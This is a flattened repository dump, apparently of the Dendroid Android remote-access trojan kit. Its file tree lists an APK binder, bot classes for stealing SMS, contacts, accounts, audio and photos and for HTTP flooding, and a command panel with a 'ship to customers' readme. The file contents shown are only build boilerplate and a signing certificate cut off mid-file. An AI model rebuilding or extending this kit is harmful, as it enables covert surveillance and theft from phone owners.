└── master ├── APKBinder ├── APKBinder.sln ├── APKBinder.suo ├── APKBinder.vbproj ├── APKBinder.vbproj.user ├── Form1.Designer.vb ├── Form1.resx ├── Form1.vb ├── My Project │ ├── Application.Designer.vb │ ├── Application.myapp │ ├── AssemblyInfo.vb │ ├── Resources.Designer.vb │ ├── Resources.resx │ ├── Settings.Designer.vb │ └── Settings.settings ├── Theme.vb ├── app.config ├── bin │ ├── Debug │ │ ├── APKBinder.exe.config │ │ ├── APKBinder.pdb │ │ ├── APKBinder.vshost.exe │ │ ├── APKBinder.vshost.exe.config │ │ ├── APKBinder.vshost.exe.manifest │ │ ├── APKBinder.xml │ │ ├── DendroidBinder.exe.config │ │ ├── DendroidBinder.pdb │ │ ├── DendroidBinder.vshost.exe.config │ │ ├── DendroidBinder.vshost.exe.manifest │ │ ├── DendroidBinder.xml │ │ ├── aapt.exe │ │ ├── apktool.bat │ │ ├── apktool.jar │ │ └── framework │ │ │ ├── privatekey.pk8 │ │ │ ├── publickey.x509.pem │ │ │ └── signapk.jar │ └── Release │ │ ├── APKBinder.exe.config │ │ ├── APKBinder.pdb │ │ └── APKBinder.xml └── obj │ └── x86 │ ├── Debug │ ├── APKBinder.Form1.resources │ ├── APKBinder.Resources.resources │ ├── APKBinder.pdb │ ├── APKBinder.vbproj.FileListAbsolute.txt │ ├── APKBinder.xml │ ├── DendroidBinder.Form1.resources │ ├── DendroidBinder.Resources.resources │ ├── DendroidBinder.pdb │ ├── DendroidBinder.vbproj.FileListAbsolute.txt │ ├── DendroidBinder.xml │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── GenerateResource-ResGen.read.1.tlog │ ├── GenerateResource-ResGen.write.1.tlog │ ├── GenerateResource.read.1.tlog │ ├── GenerateResource.write.1.tlog │ └── TempPE │ │ └── My Project.Resources.Designer.vb.dll │ └── Release │ ├── APKBinder.Form1.resources │ ├── APKBinder.Resources.resources │ ├── APKBinder.pdb │ ├── APKBinder.vbproj.FileListAbsolute.txt │ ├── APKBinder.xml │ ├── DendroidBinder.vbproj.FileListAbsolute.txt │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── GenerateResource-ResGen.read.1.tlog │ ├── GenerateResource-ResGen.write.1.tlog │ └── TempPE │ └── My Project.Resources.Designer.vb.dll ├── Dendroid APK.zip ├── Dendroid APK ├── .classpath ├── .project ├── .settings │ └── org.eclipse.jdt.core.prefs ├── AndroidManifest.xml ├── assets │ └── android-support-v4.jar ├── bin │ ├── AndroidManifest.xml │ ├── classes │ │ ├── .DS_Store │ │ └── com │ │ │ ├── .DS_Store │ │ │ ├── android │ │ │ └── internal │ │ │ │ └── telephony │ │ │ │ ├── ITelephony$Stub$Proxy.class │ │ │ │ ├── ITelephony$Stub.class │ │ │ │ └── ITelephony.class │ │ │ ├── connect │ │ │ ├── CameraView$1.class │ │ │ ├── CameraView$2.class │ │ │ ├── CameraView.class │ │ │ ├── Dialog$1.class │ │ │ ├── Dialog$2.class │ │ │ ├── Dialog.class │ │ │ ├── Droidian.class │ │ │ ├── DroidianService$1.class │ │ │ ├── DroidianService$2.class │ │ │ ├── DroidianService$3.class │ │ │ ├── DroidianService$MyLocalBinder.class │ │ │ ├── DroidianService$UploadFile.class │ │ │ ├── DroidianService$UploadFiles.class │ │ │ ├── DroidianService$callNumber.class │ │ │ ├── DroidianService$changeDirectory.class │ │ │ ├── DroidianService$deleteCallLogNumber.class │ │ │ ├── DroidianService$deleteFiles.class │ │ │ ├── DroidianService$deleteSms.class │ │ │ ├── DroidianService$getBrowserBookmarks.class │ │ │ ├── DroidianService$getBrowserHistory.class │ │ │ ├── DroidianService$getCallHistory.class │ │ │ ├── DroidianService$getContacts.class │ │ │ ├── DroidianService$getInboxSms.class │ │ │ ├── DroidianService$getInstalledApps.class │ │ │ ├── DroidianService$getSentSms.class │ │ │ ├── DroidianService$getUserAccounts.class │ │ │ ├── DroidianService$httpFlood.class │ │ │ ├── DroidianService$mediaVolumeDown.class │ │ │ ├── DroidianService$mediaVolumeUp.class │ │ │ ├── DroidianService$openApp.class │ │ │ ├── DroidianService$openDialog.class │ │ │ ├── DroidianService$openWebpage.class │ │ │ ├── DroidianService$promptUninstall.class │ │ │ ├── DroidianService$recordAudio.class │ │ │ ├── DroidianService$ringerVolumeDown.class │ │ │ ├── DroidianService$ringerVolumeUp.class │ │ │ ├── DroidianService$screenOn.class │ │ │ ├── DroidianService$sendContactsText.class │ │ │ ├── DroidianService$sendText.class │ │ │ ├── DroidianService$takePhoto.class │ │ │ ├── DroidianService$takeVideo.class │ │ │ ├── DroidianService$transferBot.class │ │ │ ├── DroidianService$uploadPictures.class │ │ │ ├── DroidianService.class │ │ │ ├── PhoneListener.class │ │ │ ├── RecordService.class │ │ │ ├── ServiceReceiver.class │ │ │ ├── UpdateApp.class │ │ │ └── VideoView.class │ │ │ └── hidden │ │ │ └── droidian │ │ │ ├── BuildConfig.class │ │ │ ├── R$attr.class │ │ │ ├── R$drawable.class │ │ │ ├── R$id.class │ │ │ ├── R$layout.class │ │ │ ├── R$menu.class │ │ │ ├── R$string.class │ │ │ ├── R$style.class │ │ │ └── R.class │ ├── dexedLibs │ │ ├── android-support-v4-fb20f63c61b92fcce3b50ef3e17f2541.jar │ │ ├── annotations-e291b16be4bd9579572c3fa2e74c9160.jar │ │ └── httpmime-4.0-182cc6914ce4f0f38af3e59230326182.jar │ ├── jarlist.cache │ └── res │ │ └── crunch │ │ ├── drawable-hdpi │ │ └── launcher.png │ │ ├── drawable-ldpi │ │ └── launcher.png │ │ ├── drawable-mdpi │ │ └── launcher.png │ │ └── drawable-xhdpi │ │ └── launcher.png ├── custom_rules.xml ├── gen │ └── com │ │ └── hidden │ │ └── droidian │ │ ├── BuildConfig.java │ │ └── R.java ├── ic_launcher-web.png ├── libs │ ├── android-support-v4.jar │ └── httpmime-4.0.jar ├── lint.xml ├── proguard-project.txt ├── proguard │ ├── mapping.txt │ ├── seeds.txt │ └── usage.txt ├── project.properties ├── res │ ├── .DS_Store │ ├── drawable-hdpi │ │ └── launcher.png │ ├── drawable-ldpi │ │ └── launcher.png │ ├── drawable-mdpi │ │ └── launcher.png │ ├── drawable-xhdpi │ │ └── launcher.png │ ├── layout │ │ ├── cameraview.xml │ │ ├── main.xml │ │ └── videoview.xml │ ├── menu │ │ └── connect_layout.xml │ ├── values-v11 │ │ └── styles.xml │ ├── values-v14 │ │ └── styles.xml │ └── values │ │ ├── strings.xml │ │ └── styles.xml └── src │ ├── .DS_Store │ └── com │ ├── .DS_Store │ ├── android │ └── internal │ │ └── telephony │ │ └── ITelephony.java │ └── connect │ ├── CameraView.java │ ├── Dialog.java │ ├── Droidian.java │ ├── DroidianService.java │ ├── PhoneListener.java │ ├── RecordService.java │ ├── ServiceReceiver.java │ ├── UpdateApp.java │ └── VideoView.java ├── Dendroid Binder.zip ├── Dendroid Panel.zip ├── Dendroid Panel ├── Dendroid Panel │ ├── .DS_Store │ ├── Other Files │ │ ├── README.txt │ │ └── SQL.sql │ ├── Panel │ │ ├── addcommand.php │ │ ├── applysettings.php │ │ ├── assets │ │ │ ├── css │ │ │ │ ├── bootstrap-glyphicons.css │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.min.css │ │ │ │ └── image-picker.css │ │ │ ├── fonts │ │ │ │ ├── glyphiconshalflings-regular.eot │ │ │ │ ├── glyphiconshalflings-regular.otf │ │ │ │ ├── glyphiconshalflings-regular.svg │ │ │ │ ├── glyphiconshalflings-regular.ttf │ │ │ │ └── glyphiconshalflings-regular.woff │ │ │ ├── img │ │ │ │ ├── banner.png │ │ │ │ ├── bannerrot.png │ │ │ │ ├── bg_off.jpg │ │ │ │ ├── bg_on.jpg │ │ │ │ ├── login_bg.png │ │ │ │ └── logo.png │ │ │ └── js │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.min.js │ │ │ │ ├── date.js │ │ │ │ ├── image-picker.min.js │ │ │ │ ├── jquery.tablesorter.min.js │ │ │ │ └── jquery.tablesorter.widgets.min.js │ │ ├── blockbot.php │ │ ├── clearawaiting.php │ │ ├── clearmessages.php │ │ ├── control.php │ │ ├── deletebot.php │ │ ├── deletefile.php │ │ ├── deletepics.php │ │ ├── filetable.php │ │ ├── functions.php │ │ ├── get-functions.php │ │ ├── get.php │ │ ├── getimages.php │ │ ├── getmessages.php │ │ ├── getwaitingcommands.php │ │ ├── index.php │ │ ├── login.php │ │ ├── logout.php │ │ ├── message.php │ │ ├── new-upload.php │ │ ├── reg.php │ │ ├── settings.php │ │ ├── setup │ │ │ ├── createconfig.php │ │ │ ├── index.php │ │ │ ├── laststep.php │ │ │ └── step1.php │ │ ├── showpictures.php │ │ ├── table.php │ │ └── upload-pictures.php │ └── README - How to ship to customers.txt └── __MACOSX │ ├── ._Dendroid Panel │ └── Dendroid Panel │ ├── ._.DS_Store │ ├── ._Other Files │ ├── ._Panel │ ├── ._README - How to ship to customers.txt │ ├── Other Files │ ├── ._README.txt │ └── ._SQL.sql │ └── Panel │ ├── ._addcommand.php │ ├── ._applysettings.php │ ├── ._assets │ ├── ._blockbot.php │ ├── ._clearawaiting.php │ ├── ._clearmessages.php │ ├── ._control.php │ ├── ._deletebot.php │ ├── ._deletefile.php │ ├── ._deletepics.php │ ├── ._dlfiles │ ├── ._filetable.php │ ├── ._functions.php │ ├── ._get-functions.php │ ├── ._get.php │ ├── ._getimages.php │ ├── ._getmessages.php │ ├── ._getwaitingcommands.php │ ├── ._index.php │ ├── ._login.php │ ├── ._logout.php │ ├── ._message.php │ ├── ._new-upload.php │ ├── ._reg.php │ ├── ._settings.php │ ├── ._setup │ ├── ._showpictures.php │ ├── ._table.php │ ├── ._upload-pictures.php │ ├── assets │ ├── ._css │ ├── ._fonts │ ├── ._img │ ├── ._js │ ├── css │ │ ├── ._bootstrap-glyphicons.css │ │ ├── ._bootstrap.css │ │ ├── ._bootstrap.min.css │ │ └── ._image-picker.css │ ├── fonts │ │ ├── ._glyphiconshalflings-regular.eot │ │ ├── ._glyphiconshalflings-regular.otf │ │ ├── ._glyphiconshalflings-regular.svg │ │ ├── ._glyphiconshalflings-regular.ttf │ │ └── ._glyphiconshalflings-regular.woff │ ├── img │ │ ├── ._banner.png │ │ ├── ._bannerrot.png │ │ ├── ._bg_off.jpg │ │ ├── ._bg_on.jpg │ │ ├── ._login_bg.png │ │ └── ._logo.png │ └── js │ │ ├── ._bootstrap.js │ │ ├── ._bootstrap.min.js │ │ ├── ._date.js │ │ ├── ._image-picker.min.js │ │ ├── ._jquery.tablesorter.min.js │ │ └── ._jquery.tablesorter.widgets.min.js │ └── setup │ ├── ._createconfig.php │ ├── ._index.php │ ├── ._laststep.php │ └── ._step1.php └── readme.md /master/APKBinder/APKBinder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Basic Express 2010 4 | Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "APKBinder", "APKBinder.vbproj", "{1860FD67-8CAF-45E4-8357-273DB1ADD78F}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|x86 = Debug|x86 9 | Release|x86 = Release|x86 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {1860FD67-8CAF-45E4-8357-273DB1ADD78F}.Debug|x86.ActiveCfg = Debug|x86 13 | {1860FD67-8CAF-45E4-8357-273DB1ADD78F}.Debug|x86.Build.0 = Debug|x86 14 | {1860FD67-8CAF-45E4-8357-273DB1ADD78F}.Release|x86.ActiveCfg = Release|x86 15 | {1860FD67-8CAF-45E4-8357-273DB1ADD78F}.Release|x86.Build.0 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /master/APKBinder/APKBinder.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/APKBinder.suo -------------------------------------------------------------------------------- /master/APKBinder/APKBinder.vbproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | Debug 5 | x86 6 | 7 | 8 | 2.0 9 | {1860FD67-8CAF-45E4-8357-273DB1ADD78F} 10 | WinExe 11 | APKBinder.My.MyApplication 12 | APKBinder 13 | APKBinder 14 | 512 15 | WindowsForms 16 | v3.5 17 | 18 | 19 | 20 | 21 | x86 22 | true 23 | full 24 | true 25 | true 26 | bin\Debug\ 27 | APKBinder.xml 28 | 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 29 | 30 | 31 | x86 32 | pdbonly 33 | false 34 | true 35 | true 36 | bin\Release\ 37 | APKBinder.xml 38 | 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 39 | 40 | 41 | On 42 | 43 | 44 | Binary 45 | 46 | 47 | Off 48 | 49 | 50 | On 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | Form 78 | 79 | 80 | Form1.vb 81 | Form 82 | 83 | 84 | 85 | True 86 | Application.myapp 87 | 88 | 89 | True 90 | True 91 | Resources.resx 92 | 93 | 94 | True 95 | Settings.settings 96 | True 97 | 98 | 99 | Component 100 | 101 | 102 | 103 | 104 | Form1.vb 105 | 106 | 107 | VbMyResourcesResXFileCodeGenerator 108 | Resources.Designer.vb 109 | My.Resources 110 | Designer 111 | 112 | 113 | 114 | 115 | 116 | MyApplicationCodeGenerator 117 | Application.Designer.vb 118 | 119 | 120 | SettingsSingleFileGenerator 121 | My 122 | Settings.Designer.vb 123 | 124 | 125 | 126 | 133 | -------------------------------------------------------------------------------- /master/APKBinder/APKBinder.vbproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /master/APKBinder/Form1.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 116, 17 125 | 126 | 127 | 215, 17 128 | 129 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/Application.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.1008 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | 15 | Namespace My 16 | 17 | 'NOTE: This file is auto-generated; do not modify it directly. To make changes, 18 | ' or if you encounter build errors in this file, go to the Project Designer 19 | ' (go to Project Properties or double-click the My Project node in 20 | ' Solution Explorer), and make changes on the Application tab. 21 | ' 22 | Partial Friend Class MyApplication 23 | 24 | _ 25 | Public Sub New() 26 | MyBase.New(Global.Microsoft.VisualBasic.ApplicationServices.AuthenticationMode.Windows) 27 | Me.IsSingleInstance = false 28 | Me.EnableVisualStyles = true 29 | Me.SaveMySettingsOnExit = true 30 | Me.ShutDownStyle = Global.Microsoft.VisualBasic.ApplicationServices.ShutdownMode.AfterMainFormCloses 31 | End Sub 32 | 33 | _ 34 | Protected Overrides Sub OnCreateMainForm() 35 | Me.MainForm = Global.APKBinder.Form1 36 | End Sub 37 | End Class 38 | End Namespace 39 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/Application.myapp: -------------------------------------------------------------------------------- 1 |  2 | 3 | true 4 | Form1 5 | false 6 | 0 7 | true 8 | 0 9 | 0 10 | true 11 | 12 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/AssemblyInfo.vb: -------------------------------------------------------------------------------- 1 | Imports System 2 | Imports System.Reflection 3 | Imports System.Runtime.InteropServices 4 | 5 | ' General Information about an assembly is controlled through the following 6 | ' set of attributes. Change these attribute values to modify the information 7 | ' associated with an assembly. 8 | 9 | ' Review the values of the assembly attributes 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 'The following GUID is for the ID of the typelib if this project is exposed to COM 21 | 22 | 23 | ' Version information for an assembly consists of the following four values: 24 | ' 25 | ' Major Version 26 | ' Minor Version 27 | ' Build Number 28 | ' Revision 29 | ' 30 | ' You can specify all the values or you can default the Build and Revision Numbers 31 | ' by using the '*' as shown below: 32 | ' 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/Resources.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.1008 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | Imports System 15 | 16 | Namespace My.Resources 17 | 18 | 'This class was auto-generated by the StronglyTypedResourceBuilder 19 | 'class via a tool like ResGen or Visual Studio. 20 | 'To add or remove a member, edit your .ResX file then rerun ResGen 21 | 'with the /str option, or rebuild your VS project. 22 | ''' 23 | ''' A strongly-typed resource class, for looking up localized strings, etc. 24 | ''' 25 | _ 29 | Friend Module Resources 30 | 31 | Private resourceMan As Global.System.Resources.ResourceManager 32 | 33 | Private resourceCulture As Global.System.Globalization.CultureInfo 34 | 35 | ''' 36 | ''' Returns the cached ResourceManager instance used by this class. 37 | ''' 38 | _ 39 | Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager 40 | Get 41 | If Object.ReferenceEquals(resourceMan, Nothing) Then 42 | Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("APKBinder.Resources", GetType(Resources).Assembly) 43 | resourceMan = temp 44 | End If 45 | Return resourceMan 46 | End Get 47 | End Property 48 | 49 | ''' 50 | ''' Overrides the current thread's CurrentUICulture property for all 51 | ''' resource lookups using this strongly typed resource class. 52 | ''' 53 | _ 54 | Friend Property Culture() As Global.System.Globalization.CultureInfo 55 | Get 56 | Return resourceCulture 57 | End Get 58 | Set 59 | resourceCulture = value 60 | End Set 61 | End Property 62 | End Module 63 | End Namespace 64 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | text/microsoft-resx 107 | 108 | 109 | 2.0 110 | 111 | 112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 113 | 114 | 115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/Settings.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.1008 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | 15 | Namespace My 16 | 17 | _ 20 | Partial Friend NotInheritable Class MySettings 21 | Inherits Global.System.Configuration.ApplicationSettingsBase 22 | 23 | Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings) 24 | 25 | #Region "My.Settings Auto-Save Functionality" 26 | #If _MyType = "WindowsForms" Then 27 | Private Shared addedHandler As Boolean 28 | 29 | Private Shared addedHandlerLockObject As New Object 30 | 31 | _ 32 | Private Shared Sub AutoSaveSettings(ByVal sender As Global.System.Object, ByVal e As Global.System.EventArgs) 33 | If My.Application.SaveMySettingsOnExit Then 34 | My.Settings.Save() 35 | End If 36 | End Sub 37 | #End If 38 | #End Region 39 | 40 | Public Shared ReadOnly Property [Default]() As MySettings 41 | Get 42 | 43 | #If _MyType = "WindowsForms" Then 44 | If Not addedHandler Then 45 | SyncLock addedHandlerLockObject 46 | If Not addedHandler Then 47 | AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings 48 | addedHandler = True 49 | End If 50 | End SyncLock 51 | End If 52 | #End If 53 | Return defaultInstance 54 | End Get 55 | End Property 56 | End Class 57 | End Namespace 58 | 59 | Namespace My 60 | 61 | _ 64 | Friend Module MySettingsProperty 65 | 66 | _ 67 | Friend ReadOnly Property Settings() As Global.APKBinder.My.MySettings 68 | Get 69 | Return Global.APKBinder.My.MySettings.Default 70 | End Get 71 | End Property 72 | End Module 73 | End Namespace 74 | -------------------------------------------------------------------------------- /master/APKBinder/My Project/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /master/APKBinder/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/APKBinder.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/APKBinder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/APKBinder.pdb -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/APKBinder.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/APKBinder.vshost.exe -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/APKBinder.vshost.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/APKBinder.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/APKBinder.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | APKBinder 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/DendroidBinder.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/DendroidBinder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/DendroidBinder.pdb -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/DendroidBinder.vshost.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/DendroidBinder.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/DendroidBinder.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | DendroidBinder 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/aapt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/aapt.exe -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/apktool.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | set PATH=%CD%;%PATH%; 3 | java -jar "%~dp0\apktool.jar" %1 %2 %3 %4 %5 %6 %7 %8 %9 4 | -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/apktool.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/apktool.jar -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/framework/privatekey.pk8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/APKBinder/bin/Debug/framework/privatekey.pk8 -------------------------------------------------------------------------------- /master/APKBinder/bin/Debug/framework/publickey.x509.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIEqDCCA5CgAwIBAgIJAJNurL4H8gHfMA0GCSqGSIb3DQEBBQUAMIGUMQswCQYD 3 | VQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4g 4 | VmlldzEQMA4GA1UEChMHQW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UE 5 | AxMHQW5kcm9pZDEiMCAGCSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbTAe 6 | Fw0wODAyMjkwMTMzNDZaFw0zNTA3MTcwMTMzNDZaMIGUMQswCQYDVQQGEwJVUzET 7 | MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEQMA4G 8 | A1UEChMHQW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UEAxMHQW5kcm9p 9 | ZDEiMCAGCSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbTCCASAwDQYJKoZI 10 | hvcNAQEBBQADggENADCCAQgCggEBANaTGQTexgskse3HYuDZ2CU+Ps1s6x3i/waM 11 | qOi8qM1r03hupwqnbOYOuw+ZNVn/2T53qUPn6D1LZLjk/qLT5lbx4meoG7+yMLV4 12 | wgRDvkxyGLhG9SEVhvA4oU6Jwr44f46+z4/Kw9oe4zDJ6pPQp8PcSvNQIg1QCAcy 13 | 4ICXF+5qBTNZ5qaU7Cyz8oSgpGbIepTYOzEJOmc3Li9kEsBubULxWBjf/gOBzAzU 14 | RNps3cO4JFgZSAGzJWQTT7/emMkod0jb9WdqVA2BVMi7yge54kdVMxHEa5r3b97s 15 | zI5p58ii0I54JiCUP5lyfTwE/nKZHZnfm644oLIXf6MdW2r+6R8CAQOjgfwwgfkw 16 | HQYDVR0OBBYEFEhZAFY9JyxGrhGGBaR0GawJyowRMIHJBgNVHSMEgcEwgb6AFEhZ 17 | AFY9JyxGrhGGBaR0GawJyowRoYGapIGXMIGUMQswCQYDVQQGEwJVUzETMBEGA1UE 18 | CBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEQMA4GA1UEChMH 19 | QW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UEAxMHQW5kcm9pZDEiMCAG 20 | CSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbYIJAJNurL4H8gHfMAwGA1Ud 21 | EwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAHqvlozrUMRBBVEY0NqrrwFbinZa 22 | J6cVosK0TyIUFf/azgMJWr+kLfcHCHJsIGnlw27drgQAvilFLAhLwn62oX6snb4Y 23 | 